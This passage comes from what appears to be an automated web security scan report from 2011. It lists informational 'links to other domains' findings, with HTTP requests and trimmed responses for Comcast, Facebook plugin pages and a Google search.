Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315329639203%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 11:59:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24148
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...
<div id="main">
   
    <script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2" type="text/javascript">..</script>
...[SNIP]...

15.114. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.143.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:43 GMT
Content-Length: 15660

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="qvEJ";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_73c8e374e06c3a7d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="KTVI ... St. Louis: Stray Rescue Looking For A Poster Dog" href="http://www.myfitv.com/videos/1425263?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAihlFIzrBbcHHG&amp;url=http%3A%2F%2Fcache.thenewsroom.com%2Fktvi%2F2011%2F09%2F03%2F27cf8413-933b-4ed4-ab52-d0e227bd3660_preview.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1425263?fb_ref=mod_fba_home" target="_blank">KTVI ... St. Louis: Stray Rescue Looking For A Poster Dog</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_69f2ddbc10bf9945"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Game On: Lafayette Jefferson vs. McCutcheon - 9/2/11" href="http://www.myfitv.com/videos/1425692?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDn8o3CVmyCPPAP&amp;url=http%3A%2F%2Ffitv-episodes.s3.amazonaws.com%2Ffrontier%2Fgame_on%2Flafayette_jefferson_89x90.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1425692?fb_ref=mod_fba_home" target="_blank">Game On: Lafayette Jefferson vs. McCutcheon - 9/2/11</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6c0693dd389133ea"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="WREG - Memphis: Impacting Culture for Christ" href="http://www.myfitv.com/videos/1418438?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQD9mu08dehnlv7w&amp;url=http%3A%2F%2Fcache.thenewsroom.com%2Fwreg%2F2011%2F08%2F30%2F825598fd-decb-4754-abd5-cebf604c73fe_preview.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1418438?fb_ref=mod_fba_home" target="_blank">WREG - Memphis: Impacting Culture for Christ</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4b1e1ef9a3cc4afc"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Arizona GOP Raising Funds With Tuscon Shooting Type of Gun" href="http://www.myfitv.com/videos/1423459?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCwDKcLl0sR3GsB&amp;url=http%3A%2F%2Fpthumbnails.5min.com%2F10343096%2F517154781_3.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1423459?fb_ref=mod_fba_home" target="_blank">Arizona GOP Raising Funds With Tuscon Shooting Type of Gun</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_652f9e335898a38c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="House of the Dead" href="http://www.myfitv.com/videos/248562?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBXZWprEKgvA9fN&amp;url=http%3A%2F%2Fthumbnails.hulu.com%2F591%2F50118591%2F233441_120x90_generated.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/248562?fb_ref=mod_fba_home" target="_blank">House of the Dead</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7a81470ee72ad2f6"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="The Invisible Life of Thomas Lynch" href="http://www.myfitv.com/videos/1395667?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQB1IeZSUlg5LPS1&amp;url=http%3A%2F%2Fecx.images-amazon.com%2Fimages%2FI%2F41DhHbBd-HL._SX120_SY90_.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1395667?fb_ref=mod_fba_home" target="_blank">The Invisible Life of Thomas Lynch</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_605c801b0ddbfe33"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Grace Potter &amp; The Nocturnals: Colors: San Diego Acoustic..." href="http://www.myfitv.com/videos/546673?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQCiVmH7SbfvZ6Zn&amp;url=http%3A%2F%2Fthumbnails.hulu.com%2F213%2F50071213%2F185282_120x90_generated.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/546673?fb_ref=mod_fba_home" target="_blank">Grace Potter &amp; The Nocturnals: Colors: San Diego Acoustic...</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_62744de0780626b2"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="NBC TODAY Show: Fun, Hip Finds for Back-to-schoolers" href="http://www.myfitv.com/videos/1423873?fb_ref=mod_fba_home" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDlEXRAsBVA5vFU&amp;url=http%3A%2F%2Fthumbnails.hulu.com%2F186%2F40035186%2F40035186_120x90_generated.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.myfitv.com/videos/1423873?fb_ref=mod_fba_home" target="_blank">NBC TODAY Show: Fun, Hip Finds for Back-to-schoolers</a>
...[SNIP]...

15.115. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fyahoorealestate&width=220&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.33
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:19 GMT
Content-Length: 8262

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/yahoorealestate" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161978_122391104495581_1192178_q.jpg" alt="Yahoo! Real Estate" /></a>
...[SNIP]...

15.116. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=210163452329780&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25493d93%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=254&href=http%3A%2F%2Fwww.facebook.com%2Fmyfitv&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.139.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:41 GMT
Content-Length: 12771

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/myfitv" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174851_415437630458_4636811_q.jpg" alt="My FiTV" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lovelyladylisah" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275469_100000531545003_5395527_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/garryw.edwards1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274816_100000247513812_5878761_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000205126235" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187558_100000205126235_1796686_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/stephen.zwack" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275055_1238460835_7560082_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000531761061" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275235_100000531761061_7560341_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1663962640" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/186032_1663962640_4186789_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276132_100000510304098_6754703_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001635776842" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275894_100001635776842_1267922_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275165_100000053147484_5755462_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000563499933" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276185_100000563499933_36507_q.jpg" alt="" /><div class="name">
...[SNIP]...

15.117. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=106890669355244&width=290&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.38
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:17 GMT
Content-Length: 8244

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/yahooshopping" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50335_106890669355244_5131_q.jpg" alt="Yahoo! Shopping" /></a>
...[SNIP]...

15.118. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=telephone+service HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:23 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 123043

<!doctype html> <head> <title>telephone service - Google Search</title> <script>window.google={kEI:"_whmTozPL-XfiAK88fWiCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute(
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=telephone+service&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.att.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CGQQFjAA')">AT&amp;T | Cell Phones, U-verse, Digital TV, DSL Internet, and <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:nchhCV8tJYIJ:www.att.com/+telephone+service&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CG0QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.att.com/accounts/" onmousedown="return clk(this,this.href,'','','','1','','0CHAQ0gIoADAA')">Manage Your AT&amp;T Accounts</a> - <a href="http://www.wireless.att.com/cell-phone-service/cell-phones/index.jsp" onmousedown="return clk(this,this.href,'','','','1','','0CHEQ0gIoATAA')">Cell Phones, Smartphones, and ...</a> - <a href="http://www.att.com/econtactus/" onmousedown="return clk(this,this.href,'','','','1','','0CHIQ0gIoAjAA')">Contact Us</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verizon.com/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CHgQFjAB')">Verizon | Broadband (DSL) Internet <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:HvcASfqqhcQJ:www.verizon.com/+telephone+service&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CHoQIDAB')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www22.verizon.com/myverizon/" onmousedown="return clk(this,this.href,'','','','2','','0CH0Q0gIoADAB')">MyVerizon 2.0</a> - <a href="http://www22.verizon.com/content/contactus/" onmousedown="return clk(this,this.href,'','','','2','','0CH4Q0gIoATAB')">Contact Us</a> - <a href="http://www22.verizon.com/residential/homephone/" onmousedown="return clk(this,this.href,'','','','2','','0CH8Q0gIoAjAB')">Phone</a> - <a href="http://www22.verizon.com/residential/highspeedinternet" onmousedown="return clk(this,this.href,'','','','2','','0CIABENICKAMwAQ')">High Speed Internet</a>
...[SNIP]...
<h3 class="r"><a href="http://www.centurylink.com/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CIYBEBYwAg')">CenturyLink | Local Provider of High Speed Internet, <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ocAFxH1QXrIJ:www.centurylink.com/+telephone+service&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CIgBECAwAg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ooma.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CI8BEBYwAw')">Free Home <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:h1LGsTid0bgJ:www.ooma.com/+telephone+service&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CJcBECAwAw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vonage.com/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CJwBEBYwBA')">Vonage VoIP <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:sUetFOlb1KAJ:www.vonage.com/+telephone+service&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CJ4BECAwBA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.vonage.com/?login" onmousedown="return clk(this,this.href,'','','','5','','0CKEBENICKAAwBA')">My Account / Login</a> - <a href="https://support.vonage.com/app/answers/detail/a_id/1381/~/contact-us" onmousedown="return clk(this,this.href,'','','','5','','0CKIBENICKAEwBA')">Contact Us</a> - <a href="http://www.vonage.com/us-canada-calling-plans/" onmousedown="return clk(this,this.href,'','','','5','','0CKMBENICKAIwBA')">Calling Plans</a> - <a href="http://www.vonage.com/world-calling-plans/" onmousedown="return clk(this,this.href,'','','','5','','0CKQBENICKAMwBA')">International Calling Plans</a>
...[SNIP]...
<h3 class="r"><a href="http://www.connectmyphone.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CKoBEBYwBQ')">Order <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:V8A2vFsWtAMJ:www.connectmyphone.com/+telephone+service&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CKwBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.steelecommerce.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CLEBEBYwBg')">Local &amp; Internet <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:IPvEGgh7oRIJ:www.steelecommerce.com/+telephone+service&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CLMBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.comcast.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CLgBEBYwBw')">Comcast Official Site | Deals on High-Speed Internet, Cable, <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:NuXImFF98C8J:www.comcast.com/+telephone+service&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CLoBECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Telephone_company" class=l onmousedown="return clk(this,this.href,'','','','9','','0CMEBEBYwCA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:0hc_Zq3drMMJ:en.wikipedia.org/wiki/Telephone_company+telephone+service&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CMMBECAwCA')">Cached</a>
...[SNIP]...
